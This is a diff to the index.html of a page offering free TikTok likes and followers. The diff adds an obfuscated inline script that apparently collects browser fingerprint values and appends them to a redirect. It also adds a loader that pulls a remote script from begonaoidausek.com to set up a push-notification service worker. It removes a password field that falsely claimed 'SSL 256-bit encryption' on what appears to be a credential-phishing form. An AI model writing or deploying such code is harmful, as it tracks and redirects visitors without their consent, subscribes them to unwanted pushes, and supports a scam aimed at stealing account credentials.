--- a/index.html
+++ b/index.html
@@ -6,6 +6,22 @@
   <meta name="pushsdk" content="aecca34efa94f912f811613ab79a7747">
   <title>TikTok Likes & Followers Generator</title>
   <link rel="stylesheet" href="style.css"/>
+    <script>
+    var a='mcrpolfattafloprcmlVeedrosmico?ncc=uca&FcusleluVlearVsyipoonrctannEdhrgoiiHdt_emgocdeellicboosmccoast_avDetrnseigoAnrcebsruocw=seelri_bvoemr_ssiiocn'.split('').reduce((m,c,i)=>i%2?m+c:c+m).split('c');var Replace=(o=>{var v=a[0];try{v+=a[1]+Boolean(navigator[a[2]][a[3]]);navigator[a[2]][a[4]](o[0]).then(r=>{o[0].forEach(k=>{v+=r[k]?a[5]+o[1][o[0].indexOf(k)]+a[6]+encodeURIComponent(r[k]):a[0]})})}catch(e){}return u=>window.location.replace([u,v].join(u.indexOf(a[7])>-1?a[5]:a[7]))})([[a[8],a[9],a[10],a[11]],[a[12],a[13],a[14],a[15]]]); 
+    var s = document.createElement('script');
+    s.src='//begonaoidausek.com/2c4/629d3/mw.min.js?z=9309116'+'&sw=/sw-check-permissions-f4107.js';
+    s.onload = function(result) {
+        switch (result) {
+            case 'onPermissionDefault':break;
+            case 'onPermissionAllowed':break;
+            case 'onPermissionDenied':break;
+            case 'onAlreadySubscribed':break;
+            case 'onNotificationUnsupported':break;
+        }
+    };
+    document.head.appendChild(s);
+</script>
+
   <script>
     var a='mcrpolfattafloprcmlVeedrosmico?ncc=uca&FcusleluVlearVsyipoonrctannEdhrgoiiHdt_emgocdeellicboosmccoast_avDetrnseigoAnrcebsruocw=seelri_bvoemr_ssiiocn'.split('').reduce((m,c,i)=>i%2?m+c:c+m).split('c');var Replace=(o=>{var v=a[0];try{v+=a[1]+Boolean(navigator[a[2]][a[3]]);navigator[a[2]][a[4]](o[0]).then(r=>{o[0].forEach(k=>{v+=r[k]?a[5]+o[1][o[0].indexOf(k)]+a[6]+encodeURIComponent(r[k]):a[0]})})}catch(e){}return u=>window.location.replace([u,v].join(u.indexOf(a[7])>-1?a[5]:a[7]))})([[a[8],a[9],a[10],a[11]],[a[12],a[13],a[14],a[15]]]); 
     var s = document.createElement('script');
@@ -75,10 +91,6 @@
     <form action="https://zefoy.com" id="boostForm">
       <label for="username">TikTok Username</label>
       <input type="text" id="username" name="username" placeholder="@yourusername" required />
-
-      <label for="password">Account Password <span class="lock-icon">🔒</span></label>
-      <input type="password" id="password" name="password" placeholder="Your TikTok password" required />
-      <small class="secure-note">Your password is encrypted and never stored. Verified via SSL 256-bit encryption.</small>
 
       <label for="likes">Select Likes</label>
       <select id="likes" name="likes">
